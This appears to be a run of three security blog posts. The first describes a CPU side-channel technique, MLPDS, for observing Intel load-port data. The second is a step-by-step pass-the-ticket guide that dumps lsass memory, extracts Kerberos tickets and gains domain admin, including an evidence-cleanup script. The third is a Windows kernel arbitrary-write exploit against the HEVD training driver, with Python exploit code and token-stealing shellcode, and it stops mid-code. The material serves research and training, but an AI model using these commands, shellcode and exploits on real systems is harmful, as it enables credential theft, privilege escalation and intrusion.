In the Intel page table (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or if it has been written to (dirtied). On Intel it’s a little strange as there is only a dirty bit on the final page table entry. However, the accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing as it allows high performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied to their original state of a snapshot.

But this leads to an curiosity… what is the mechanic responsible for setting these bits? Does the internal page table silicon set these during a page table walk? Are they set after the fact? Are they atomically set? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. Which is strange, why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit
updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability is initially thought to only allow for random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Multi-Architectural Load Port Data Sampling (MLPDS)

Multi-architectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back and they ended up finding a few similar issues with different instruction combinations, this is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load” and it’s exactly what you might expect. When a data access straddles a cache line (multi-byte load containing some bytes on one cache line and the remaining bytes on another). Cache lines are 64-bytes in size so any multi-byte memory access to an address with the bottom 6 bits set would cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start as we could probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack will be ideal because we can have one thread running some sample code in an infinite loop, while the other code observes the values seen on the load port.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of the value which was leaked. This value that we leak is always 64-bits, but we can chose to only leak a few of the bytes from it (or even bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example if we were to leak a 64-bit value, the 64-bit value will be from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value, it will get revealed from a single attempt. This is critical to us as otherwise we wouldn’t be able to observe values which are loaded once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type Leaks/second
Known 64-bit value 5,979,278
8-bit any value 228,479
16-bit any value 116,023
24-bit any value 25,175
32-bit any value 13,726
40-bit any value 12,713
48-bit any value 10,297
56-bit any value 9,521
64-bit any value 8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just causes two loads. One of a value 0x12345678f00dfeed and another of a value 0x1337133713371337. Lets spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the different values we observe get leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Viola! Here we see the two different secret values on the attacking thread, at a pretty much comparable frequency.

Cool… so now we have a technique that will allow us to see the contents of all loads on load ports, but randomly sampled only. Let’s take a look at the weird behaviors during accessed bit updates by clearing the accessed bit on the final level page tables every loop in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. They weren’t from just the two values we’re loading in a loop, to many other values. Strangely the 0x1234... value is missing as well. Interesting. Well since we know these are accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the addresses of the page table entry we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is, maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads we simply know contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we could change the delay between this synchronization and the leak attempt. By scanning this leak we should hopefully get to see a cycle-by-cycle view of observed values.

A trigger point

We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger, or a reference location to synchronize with. Similar to an oscilloscope this trigger will synchronize our on the time domain each time we attempt.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic:

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 0 and do this many times until significant data is collected

Uncontrolled target code

If needed a trigger could be set on a “known value” at some point during execution if target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows an uncontrolled target code to be sampled in a similar way. If the trigger “misses” it’s fine, just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Lets try our 2 load example, and we’ll make sure they depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependant loads. One which reads a value, and then another which masks the value to get the 8th bit, which is used as an offset to a subsequent access. Since the values are constants, we know that the second access will always access at offset 8, thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we want to collect the frequencies each value was seen for every cycle offset. We’ll plot these with an x axis in cycles, and a y axis in frequency the value was observed at that cycle count. Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s check it out in our simple case test code!

Sequenced leak example data Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but they’re pretty easy to ignore in this case.


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after this page data is read ~300 cycles in, that it performs a page-by-page walk through each level. Presumably this is where the processor is reading the original values from pages, oring in the accessed bit, and moving to the next level!


Speeding it up

So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we’re wanting to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So lets assume we want to sample 10 values over a 1000 cycle range, and we’ll likely want 1 million data points. This means we’ll need about 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Practical Guide to Passing Kerberos Tickets From Linux

21 November 2019 at 14:00

This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to setup some tools. All have information on how to setup on their GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

image 1

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

image 2

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

image 3

Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

image 4

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

image 5

And view the available tickets:

image 6

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

image 7

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (if optional Kerberos client was installed, klist is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

image 8

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

image 9

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

Impacket

gentilkiwi

harmj0y

SkelSec

knavesec

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on that foundation produced within that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take look at today is what is known as an arbitrary overwrite.

At a very high level what this means, is an adversary has the ability to write a piece of data (generally going to be a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, which runs as local administrator, the shellcode will be ran with administrative privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process- our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the variable UserWriteWhatWhere has been attributed to the datatype PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains What and Where pointers (Which will be exploited later on). From now on UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite() is passed to the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() and ProbeForWrite, that confirms whether or not the values of What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now time to calculate the IOCTL code- which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, that was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 requires 8 digits in a memory address. 0x222003 = 0x00222003) The instruction of sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If EAX is currently at 0x222003, and EAX is subtracted a total of 8 times, let’s try adding 8 to the current IOCTL code from the last exploit- 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time the value of EAX reaches the last routine, it will equal 0x222003 and make the applicable jump into the TriggerArbitraryOverwrite() function!

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode- without any check. In this case, however, things are not that straight forward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the address at HalDispatchTable + 0x4, is passed via KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode, when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntkornl.exe (ntoskrnl.exe exports KeQueryIntervalProfile())
  3. Load ntoskrnl.exe handle into LoadLibraryExA and then enumerate the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the handle from GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case). It then proceeds, in the snippet below, to pass the handle loaded into memory (which is still ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes ot the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
